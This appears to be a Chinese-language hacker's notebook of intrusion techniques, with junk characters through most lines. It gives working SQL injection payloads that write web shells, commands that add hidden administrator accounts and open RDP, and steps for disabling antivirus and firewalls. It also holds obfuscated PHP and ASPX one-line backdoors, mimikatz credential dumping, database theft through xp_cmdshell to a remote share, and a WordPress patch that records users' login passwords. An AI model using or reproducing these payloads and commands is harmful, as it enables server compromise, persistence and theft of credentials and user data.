& r4 w: }; ?& o! y- D/ @查询sql server 2005中的密码hash  W5 Y$ y( w2 H5 [% ~+ w! k$ @
SELECT password_hash FROM sys.sql_logins where name='sa'* a$ D9 x! n. p5 ^
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
- W: G4 Z" u2 f* v% L" Raccess中导出shell
6 E) V4 A% L( O# @$ I
" u/ x- G* u0 f& p/ m! p6 t* L中文版本操作系统中针对mysql添加用户完整代码:' Y- b0 e  K% ^1 _3 q

  U1 i# C+ v0 a2 _8 huse test;
3 m& Z" E6 \- G) e% I6 J9 ?- [create table a (cmd text);* T' {) J$ s# S: e* v
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
- e, x5 u( P  _* xinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
5 A2 @! m; a% [( J) L0 b3 finsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );  k7 R' B! C  _) m! n
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
2 l/ S& G5 K4 u% w" ~1 m  X5 hdrop table a;
- W! E& a# s6 b7 o- P8 a
# g% n- u$ b4 p3 f7 Y+ i英文版本:
% c5 c/ C& r6 h! f2 v0 t
/ o7 v5 R8 a: d9 f: vuse test;
& f( C: G, b! Q: z6 gcreate table a (cmd text);
  g+ {& s/ H, ?6 f$ L  N) _insert into a values ("set wshshell=createobject (""wscript.shell"") " );: r/ s) L/ ~- d- Z5 }& p' o
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );8 U5 d' L, [0 }. ?/ [4 O! ^+ w
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );; }5 Z' H% n3 E" Z
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
3 l: K2 B, W: S  ^drop table a;5 e& [" s4 N. N
  v# C. W+ ]1 \% {
create table a (cmd BLOB);! [1 V- e- y& H) O' D3 {% o
insert into a values (CONVERT(木马的16进制代码,CHAR));
, R5 R1 G+ _5 y3 J7 e, Y: q2 G4 `select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
1 H: ^: I8 V; r8 Ldrop table a;
/ |* K7 X$ H% I* S* o2 t
+ j7 ]0 k0 l. y! V5 I记录一下怎么处理变态诺顿
. x  q/ h: @  w5 o/ m查看诺顿服务的路径
( N% B0 l9 `  l) Z. R) k% A: E  Osc qc ccSetMgr
' M7 m4 H& O6 E然后设置权限拒绝访问。做绝一点。。
6 [: H" ]2 c8 ?6 _3 ~, A$ `cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
! u; I" I" e* l" }0 B9 _. J) ^: \cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
7 I, k. F/ m( a5 s8 Xcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
; T+ |  F" }) v- }, Q- m& }cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone* N& \2 e9 y. ^! F! `
$ P9 p4 O/ f1 a1 i5 B" [
然后再重启服务器
8 |- r+ U- D5 jiisreset /reboot; E+ q7 ?# s7 k: o2 y$ `8 @
这样就搞定了。。不过完事后。记得恢复权限。。。。1 n) n6 F) U6 b, {( I6 J0 r
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F2 u9 y3 ]: O+ X  F. {. B3 W
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
: ]* m" f) _- ^cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
7 X% h- V4 y# `  q% h5 A1 c9 N# n( ocacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F  G# x) b6 R  ^1 S
SELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
* j- u* w% |/ ?- z) Y4 A! X% R' q, u" w4 L
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')- e) `7 Z$ }3 R% O

: b0 F; n) s; I8 k$ Gpostgresql注射的一些东西
) ^% f5 u$ l! Q8 o, m如何获得webshell* {2 i* ]# m# y( s
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); 3 _! \. ]! d' r
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
" S; A6 ^* G& @! h# Y* ?http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
" F2 D0 i8 D3 C. Z3 _, X" ~如何读文件
  P: v! B1 |2 i/ x( Nhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
8 i0 _7 f/ ^; d' P) }: Lhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
7 R. J/ k# }! Q" u7 phttp://127.0.0.1/postgresql.php?id=1;select * from myfile;8 [' W* S& R. O: ^9 j+ P) [

0 n* [) m$ O& Oz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
2 W4 C1 x7 `$ V0 b: f当然,这些的postgresql的数据库版本必须大于8.X' f3 N- J2 Q, F0 d3 V( b" w
创建一个system的函数:
' M4 X3 X& N/ KCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
7 f+ ?$ E6 ?, N0 i. S6 T
- ^! O$ K% @9 x& c  H创建一个输出表:$ s2 [! K7 \3 ]+ e, D7 U6 c* J/ c  r/ R
CREATE TABLE stdout(id serial, system_out text)) f' u$ j7 b  q& }! n$ ~

! j" e" c$ y; L8 }3 ?执行shell,输出到输出表内:
" K/ ]# `& F5 O* Y, H) T! M' zSELECT system('uname -a > /tmp/test')
- V0 \: \* j" Y. i6 a+ a- j: D
* S( p& q! t3 G+ ?+ @4 |6 X1 x) Tcopy 输出的内容到表里面;
/ B5 ^" a9 `: A" bCOPY stdout(system_out) FROM '/tmp/test'3 c8 A6 o4 E- W
& [. ~9 O: W# U4 ?
从输出表内读取执行后的回显,判断是否执行成功
) s1 l& p! x/ U3 n' Y( Y) |; s2 S
1 T+ ~6 i0 I. t' V) N7 F& nSELECT system_out FROM stdout9 b/ s! ]' y. l  e9 T+ r; Q3 A
下面是测试例子" w' B- P5 ^7 M; h" q
/ q6 C) b% x9 L2 J$ {1 J
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- 9 }8 v5 T. T! a/ Q

4 a1 [: t! F( H5 j+ u/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'5 N" d4 I4 D0 I; l8 b
STRICT --. q& e. R' J2 t

! C6 H. P6 r4 h9 z/store.php?id=1; SELECT system('uname -a > /tmp/test') --
+ T) M9 \7 l! |. B: @$ r  ]& c. p3 ]1 M: c! X
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --! L2 l+ ~( }: C: ~3 J" C& {
" m4 u# @) t6 W% @. ^1 n
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
7 u3 W  j- `' k) u$ [3 T6 Znet stop sharedaccess    stop the default firewall
$ Y+ `/ {. O  j/ g, \, `* Xnetsh firewall show      show/config default firewall. ~# ?5 j6 K9 f2 G0 d( a
netsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall1 n  u0 M+ U: w7 z$ l4 C3 ]9 }
netsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall
2 T9 l6 \. R+ I# Z9 I/ ]1 D修改3389端口方法(修改后不易被扫出)2 \7 H! Z1 {2 E) C% n0 q3 X
修改服务器端的端口设置,注册表有2个地方需要修改
- B' T" q/ z: o5 i# t" U( w
8 {& E  [( @( u' ^( x4 K) ^[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
5 i, G! R4 l( D$ i7 }PortNumber值,默认是3389,修改成所希望的端口,比如6000" i) `. q5 b" U1 Y, ~/ Y

0 ]3 v. v4 M" ^8 Q# A! I第二个地方:7 o' @7 |. r1 a  T* i' ^9 B! r# F
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] 
& I" f& \$ h3 {, mPortNumber值,默认是3389,修改成所希望的端口,比如6000$ O* ?# y, l2 v0 r8 v2 x" g: ~2 h
! t/ c( B3 K! [& t
现在这样就可以了。重启系统就可以了
& U( v6 Z) {6 f4 P' w
7 o& q8 m+ }% d' y+ y查看3389远程登录的脚本
6 Q3 Z2 i5 o9 b; D- Q. w保存为一个bat文件
3 i5 _5 e( C, e! q* zdate /t >>D:\sec\TSlog\ts.log$ B) X# P. M2 y3 H* N( Y) \6 v
time /t >>D:\sec\TSlog\ts.log
2 Z  T0 B& ]: ]9 K! \netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log4 B# `6 [- x0 {; J
start Explorer
7 v" P7 a* W' s1 w; [# D' j/ @/ T  X0 ^3 \9 T# \
mstsc的参数:! [4 ~) s' V6 u  Z9 O7 k

/ Z$ R  k% M* p8 V2 l2 N/ S远程桌面连接
% G1 h7 }+ ?; J7 N2 H( |0 M- Z2 D# [' o$ w6 R; F- l9 |7 F
MSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]* Z# ?3 O) f* `; f6 [
  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
- p9 n( w' P7 j: @/ m1 a
1 w9 v8 P( j) B  y$ ?<Connection File> -- 指定连接的 .rdp 文件的名称。. ~1 ^; M8 j: q5 H! P7 ^
: y6 o) u' |9 v2 p* I2 T, z  k
/v:<server[:port]> -- 指定要连接到的终端服务器。6 @9 ?. w4 U* q; M
) g  t2 Q* Z( n2 @- w
/console -- 连接到服务器的控制台会话。8 o  X7 X6 _9 N4 C
3 u0 M) e$ v# L+ W! R* I' Q
/f -- 以全屏模式启动客户端。1 Q* L% {9 W+ k4 o

  ]1 X1 u! M0 _2 c! q/w:<width> --  指定远程桌面屏幕的宽度。. e/ G5 d/ U  h9 W
* X. |1 \' l5 Y& M, ?8 T( M  }
/h:<height> -- 指定远程桌面屏幕的高度。- I" [) D, k( r7 F) d& K0 L; \

! r- ]+ F% O  y( O' G/edit -- 打开指定的 .rdp 文件来编辑。6 f! e5 o6 c! n
6 v% t. t1 D/ z
/migrate -- 将客户端连接管理器创建的旧版' E( j2 _( X- j$ B$ D# X
连接文件迁移到新的 .rdp 连接文件。
% E9 y8 X4 e% g8 S, ]$ n
5 c  j3 o& {2 m% H& Q2 S. }9 z5 ?
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就$ ^. h8 N# M. Q+ L" l5 H) A7 B
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
: i6 S' C. r% s( X* V5 J1 V- b2 Y5 V( T
命令行下开启3389
9 ?. A, Q8 K( m  W* Pnet user asp.net aspnet /add
( ]/ ]3 E) x' o: n: A" N/ C$ ?) znet localgroup Administrators asp.net /add
& @& K9 f) R) _5 J8 pnet localgroup "Remote Desktop Users" asp.net /add
# }0 N; M: [  R7 `3 P8 P  ], Kattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
* p) }4 ~0 O' g, Zecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 03 p1 C% Y9 Y0 N  A/ ]; B
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 16 Z% j1 P+ R, R: `" `
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f/ f% Q* W. _8 W# M
sc config rasman start= auto6 c/ G- g8 \  f9 v" w
sc config remoteaccess start= auto
# t5 e: V  ?# K# M8 s! N8 R  Onet start rasman
  v5 b1 X3 Q# F8 v' @$ g; d1 O) ]1 q1 Fnet start remoteaccess
2 S* w. {( \/ I: @Media% m& P+ N& M/ G3 U9 ?
<form id="frmUpload" enctype="multipart/form-data"
5 n" m, Q+ ^; caction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>' h- ?4 R; h$ M
<input type="file" name="NewFile" size="50"><br>
+ L0 O/ D5 }1 A8 X  N6 }<input id="btnUpload" type="submit" value="Upload">
# L! S! J2 B) T5 {8 u$ m2 W</form>
5 M& U, t/ o, t( ]/ ~( _2 V; G& ~& Z! G$ g
control userpasswords2 查看用户的密码
( V9 A8 F6 g  m6 Caccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径- M4 {3 s* s4 |* j! l
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
% Y2 |/ o/ Q& }% j& J  S, B% }9 Z2 R# k- ^* y
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
; O3 a$ r% Z( x& x. y测试1:# J% E: E' ~" {+ e) C
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1! B0 g. {" V) u: M8 i) L) v
1 C& v3 p0 V  X: X5 `
测试2:
, X" j! D9 T5 o! \, I
' @2 G& t0 [; p" Ucreate table dirs(paths varchar(100),paths1 varchar(100), id int)
0 n4 }  d# }: L; T" _
: t, d2 a& p; c- m. F) N6 {! vdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
9 ~' c1 r# Z2 v, Z
3 j- P' r# J5 ]2 SSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
7 n, I# ?+ E$ z6 ?关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令& s5 c) f  Q8 G1 D, O
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
8 F- j. O+ n! m+ s0 }net stop mcafeeframework
) |& Q0 X2 d# ^net stop mcshield! f  d# N( \: u6 i$ R
net stop mcafeeengineservice
: X& K6 x( F# Bnet stop mctaskmanager0 W& {+ x9 N2 S- w* ?, y, K$ n
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
' L8 ^" U( Y/ ?$ v+ u2 v  ~. p9 c" Z7 Z
  VNCDump.zip (4.76 KB, 下载次数: 1)
6 Q4 ?9 n8 }" g; C3 u; C- Z密码在线破解http://tools88.com/safe/vnc.php- X! S% j- }# H, F. y% O0 n/ P6 t' \
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
3 A; f8 C' F/ c. S) {; i  q3 l( _/ V9 x: t) I
exec master..xp_cmdshell 'net user'
* o9 P7 w5 b. V* r2 _mssql执行命令。
& }) o1 k1 o* d/ U; x" q获取mssql的密码hash查询
+ e4 v3 A2 B7 v2 V5 V+ _select name,password from master.dbo.sysxlogins
8 A7 T0 i' g/ k, f
3 q: C6 t0 C* |& A- |- _% j6 n! K; ^backup log dbName with NO_LOG;8 s9 ]* s( K: L% e
backup log dbName with TRUNCATE_ONLY;( K. {7 A  ?5 k  S
DBCC SHRINKDATABASE(dbName);
% ?; m+ G# h* u% L& K8 b- o3 kmssql数据库压缩' V% J$ [  u! h9 V% m1 S, I
5 b5 V( n" ~) g
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK% ?/ K, X, P" O* E( C; K0 A8 q/ E
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
! j9 x3 x9 w, |- m. m2 i/ f2 ~2 E
( X9 @/ \7 ?: x/ K" C, x2 J3 n1 Vbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'; O/ m& x- ~) m
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
& [% V$ |, G0 f" G9 A) M3 G! D! l! @# M9 G
Discuz!nt35渗透要点:8 l: Q, R8 r/ R: [0 e
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default) B- z, ~6 {, k- o
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
% F# N' e4 g% j) `7 l4 [+ j& ](3)保存。$ N, u+ D) t( m- C
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass. d( E7 |9 p8 _5 @0 I+ ?" C
d:\rar.exe a -r d:\1.rar d:\website\
+ D7 P) P4 {$ h, r7 i& N1 w递归压缩website: J! |4 y4 w) C
注意rar.exe的路径
5 k4 y' X$ M- {# H% C7 K. U
/ M: Z: K$ Q& M0 d* {<?php
  [  k) N" V0 P
  c- w. a2 s$ o; x; y$telok   = "0${@eval($_POST[xxoo])}";8 V. M  v2 f# `+ j  i. d0 h
! Q$ _9 H! u. z+ z
$username   = "123456";
. w* q+ {+ I: T/ I
/ S9 v" f4 a  G/ h* V$userpwd   = "123456";
2 ?& M; W& u: b! M6 e
3 M. @! m2 T7 z+ K$telhao   = "123456";8 y+ U+ t. ~/ K* X5 b4 T9 x

& M/ J' b' T7 {/ y7 P! }* [. K$telinfo   = "123456";
! c& c9 Q) C; S  b# ~
, y, }% ^# p3 e2 o?>
+ L6 ~$ A( {# t3 ]7 f* c3 cphp一句话未过滤插入一句话木马$ z9 `9 {. u8 X1 B0 @$ _' {4 t

8 p7 c9 B" _: W站库分离脱裤技巧
1 a) l/ U0 x0 i1 l* _# Qexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
4 ]/ B2 N# Q3 Xexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
- s+ Z2 ~& S% P% W: c" \8 K条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
  W# |3 E2 a, [+ W这儿利用的是马儿的专家模式(自己写代码)。1 W# G; y3 p. \. ~
ini_set('display_errors', 1);
* b8 Q0 H3 @. Wset_time_limit(0);2 d2 k4 Y. _# ^! C# h+ J  N
error_reporting(E_ALL);2 S4 L8 H" _, l7 P( `
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());( n9 ]3 k0 s$ i5 a& p+ Z
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());5 W- Q5 d$ d0 r# Y5 U4 N
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());( c+ Q9 j. P0 D: S$ p/ @! b, U
$i = 0;( _6 U1 W( u7 x# P4 V- s  D# ]
$tmp = '';
: y$ o+ k; r$ s" @$ B, J; rwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {
3 v1 V/ g+ m* _$ d) ]0 M/ h8 D; B* [    $i = $i+1;
& D. e* X7 G, ?7 l3 _( ?    $tmp .=  implode("::", $row)."\n";
2 n; o. N" P+ G4 Y    if(!($i%500)){//500条写入一个文件, m: A$ U: [! m- Z0 d
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
5 Q* z' T: W* e; D2 U8 G6 @1 A" z        file_put_contents($filename,$tmp);% h0 L3 n* c* T, M
        $tmp = '';/ x" }# G4 d6 T: K
    }5 S0 j% n7 ], Y! b! ~+ J& L
}
$ I  \, \9 F& a7 K7 }) Hmysql_free_result($result);1 k( A8 B9 F% _6 c3 ^. r5 b

: r  d2 {, I+ ]4 D0 G- \! f. \, ^% D7 h5 b, X
7 B' b) h+ `/ K; z. h
//down完后delete3 {: O# v* P- e& O% w! N
$ I$ a/ R9 e0 P9 E0 p4 d" u, d

' B; n8 t, s1 O6 M$ n1 j% Nini_set('display_errors', 1);( H% V- l- I% ?, c- m1 Y
error_reporting(E_ALL);3 Y  \  ~; c8 j$ g0 {' D% ^
$i = 0;
4 H; [( B" |4 H4 Z, v/ C5 J' ?  Z& _while($i<32) {
: N/ t# Y5 v6 N1 f0 K2 R    $i = $i+1;
6 @; G+ L/ X* B5 ^) |8 N        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';1 U- L& `% D0 J% C/ t
        unlink($filename);
# p0 z6 y+ S# }# P& _1 q* w) g  V} 7 e6 h' t- ~8 X
httprint 收集操作系统指纹/ T# n& [( g: n/ h
扫描192.168.1.100的所有端口
0 Y! S' L3 F+ Mnmap –PN –sT –sV –p0-65535 192.168.1.100
' ]# r# B7 [$ ~9 y7 m8 \host -t ns www.owasp.org 识别的名称服务器,获取dns信息; }, b& n) p( }% K
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输' ~1 Z1 Y6 c; q& f; W0 e
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
8 S2 y% B" j" T7 x$ y+ ]7 Y5 ?' @, M4 o* c# I- C
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
6 R8 U1 `1 [6 b9 y8 R6 E# X
* z, _1 F9 k) ]6 v2 v" ]$ a3 r  MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
2 I$ Z  c$ z5 a4 q5 S1 e" h" w+ E
% y5 @* l* T8 R2 y" K  Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x) v* f  Y, Y5 ]. [% k5 K; t

) ~$ P! F9 g; L: i; l0 J  DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
9 ~! L3 j7 n  U# |1 ^, @6 R- Q& A7 U3 M+ |$ j/ Y
  http://net-square.com/msnpawn/index.shtml (要求安装)
7 G0 d9 S& e& f7 R( g, a% X/ Z$ y3 `/ j
  tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)" Z+ s: R, U* M8 g; H3 |
. {; Y1 Z! O# b' g  Q& ?1 S
  SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)/ d, V) A" K/ M+ {) W+ _5 I' b* N* A
set names gb2312
% ^% K) C8 G$ M% o导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
% u# a, F) X, @" v, \6 S' }- M. G0 H. ]% r" C3 _
mysql 密码修改
+ M6 O) T7 N+ R/ t2 ZUPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ” ( O: s4 y3 g4 U
update user set password=PASSWORD('antian365.com') where user='root';
) B: y* A- r6 W2 Lflush privileges;
7 e6 k" ~0 O+ t2 c8 f, U5 W高级的PHP一句话木马后门
$ q# Q" O- u! a8 F2 b# U1 q" n) B; ^+ u$ W$ h) P
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
6 t) y, \% J0 t: \2 J6 }0 {. M6 K, X$ T4 J! A/ w
1、- M3 Y/ |. {& E+ F

1 @. f6 p/ V: v- E6 G+ N$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";$ ~4 |7 G* _4 g# i; m  a; W6 e

1 W5 P% h) F4 e. |$hh("/[discuz]/e",$_POST['h'],"Access");5 ^8 a, D0 V+ J+ u/ h# |

$ B) L# p5 x! [/ U//菜刀一句话- n% E& Q- r6 a% g# @" ~" |
, l& E% _& a/ ^5 u! w# }
2、0 s. l9 l" ?9 E. F

. Y% l4 I* \3 M$ z- h6 ?+ ~) R9 k; w$filename=$_GET['xbid'];; o+ ?8 C/ h, @1 G( J8 ]5 Y5 H$ Z
) z( o- p) j0 q: G5 S+ i
include ($filename);
, E) O6 i! o- F$ X1 ^
) h( d; F3 v+ p* U3 B0 r' b//危险的include函数,直接编译任何文件为php格式运行6 T: x- }4 `8 D
! v: s8 o5 j2 t$ P
3、
: ~3 x' C4 c- K2 g8 P
, k9 ]: |1 p' W* B$reg="c"."o"."p"."y";
! y2 B9 q) e9 |1 C0 @9 R* s6 ^; W
/ s+ |, Z. h: m  B9 S9 ^$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
0 i. x% Y- }- P3 L6 W" j( c7 \" t9 J! k' B! v! [" b" g, Q
//重命名任何文件
) Q6 q( a( a: i( }# T7 C" ]: Q* M* q( }
4、
: i2 G% A' K3 v4 s, |& l$ n9 q! f. S7 z& L' Z* h
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
3 Q0 w" a# H" \$ k8 Q7 G& j4 B9 v! b3 y
$gzid("/[discuz]/e",$_POST['h'],"Access");
% l/ a- ~. F; a1 H; C) b. w3 L# m( ?
//菜刀一句话
# E2 N% |! g* f* j1 g$ _7 g5 I6 T) q! a* ]* E9 Y; |; F
5、include ($uid);
1 l8 C! |: h" q
! B7 V5 u! T4 j+ Z2 `+ q6 Q//危险的include函数,直接编译任何文件为php格式运行,POST . p' d0 R5 ^( r

: c5 L4 g/ p/ ~3 n1 J$ v# L. B8 {, J) a# j  X' f- [
//gif插一句话, h8 u1 z/ W$ E1 S. \8 y" ^

: \! T5 j- P7 L' A6、典型一句话
# F1 _0 X6 _3 y4 {: m9 O5 X0 i
- Y: P5 `- Y( S' s. E程序后门代码
" a! G' P4 H. q* c5 T6 ^$ K, `8 M/ R<?php eval_r($_POST[sb])?>
8 V! Q7 H" C* d2 A9 s6 l& j程序代码
  |( d8 R# D7 ~9 E<?php @eval_r($_POST[sb])?>8 H: h* d% ?+ h
//容错代码, S% i! b- r) f% v3 \; V0 b  p' ]$ P
程序代码
( A; y  z# H+ C' X7 B/ S<?php assert($_POST[sb]);?>
3 @# o0 ?+ o1 {6 p! F5 q3 `//使用lanker一句话客户端的专家模式执行相关的php语句
3 n" @% A9 _. j+ c; z程序代码+ N& x4 C( l" \# C
<?$_POST['sa']($_POST['sb']);?>0 t2 ^$ [: D9 e  t7 Y5 ~) h" ~
程序代码* s* k4 D5 G2 o# x) t8 g) G
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>( Y! V, X( ~& P( p  \
程序代码
1 p+ B5 _& C1 w<?php8 k( X5 s: Z2 k( j) }; c: ]
@preg_replace("/[email]/e",$_POST['h'],"error");, P) I) a' |. X
?>
/ e$ ]) B, w5 ]$ s7 N# n//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
1 o) R. N6 N9 f( b$ @9 t程序代码
3 w5 f1 b% @* _! W/ A- E6 U<O>h=@eval_r($_POST[c]);</O>
/ E0 \; T: u* l. Q1 n; |程序代码
4 K# o7 d* d8 W2 [2 f2 |7 i<script language="php">@eval_r($_POST[sb])</script>
6 s) s* x0 k6 e- y/ h//绕过<?限制的一句话: k+ H8 d, E, I/ m1 d3 G2 ?
" F0 M$ G2 ]: S3 K  ?
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
  k3 n! Q( b7 p: {3 k详细用法:+ x2 d# _3 {1 S9 g1 }  Y7 M
1、到tools目录。psexec \\127.0.0.1 cmd% K& s: H4 Q  ?7 o9 R$ _
2、执行mimikatz0 k; M1 H$ T9 Z' x0 Q; Y& J5 i' F
3、执行 privilege::debug
. U, z) z  _' U9 _# h4、执行 inject::process lsass.exe sekurlsa.dll+ Y, r2 |. w4 z2 |
5、执行@getLogonPasswords
4 F7 f* u; q4 z6、widget就是密码4 D7 c& Z% f3 m7 D# f8 p) e, E1 r
7、exit退出,不要直接关闭否则系统会崩溃。+ w, U1 R/ D2 U# \# t( N

8 Y, V5 ~/ L0 l3 Yhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面' O/ V0 h  C/ f: R
2 g- l6 ^% U* J0 V5 d5 b
自动查找系统高危补丁) H# R+ ]  x; _) b9 _8 T, v
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
3 I+ U) w& r6 a$ l8 k
2 [0 B' K9 p/ r; C突破安全狗的一句话aspx后门
1 T! H5 Q- t: k<%@ Page Language="C#" ValidateRequest="false" %>
/ f4 j4 D& d8 J& d3 v<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>1 w7 i) X+ E3 i( d% n
webshell下记录WordPress登陆密码( S2 u1 Y2 o; I# J2 L' B3 X5 E9 A
webshell下记录Wordpress登陆密码方便进一步社工5 k; R. C& C6 V& L+ l. l+ h5 a- q
在文件wp-login.php中539行处添加:
3 q" h" T2 p# @6 }( I// log password
4 v" q- }7 K, `! ~$log_user=$_POST['log'];7 v6 m: ~; }/ q0 L. ?! d4 \( n
$log_pwd=$_POST['pwd'];
( g# F( X& ]! z, ~2 E% |! R$log_ip=$_SERVER["REMOTE_ADDR"];1 S7 `  I/ N& N4 J7 {. ~! N+ q
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
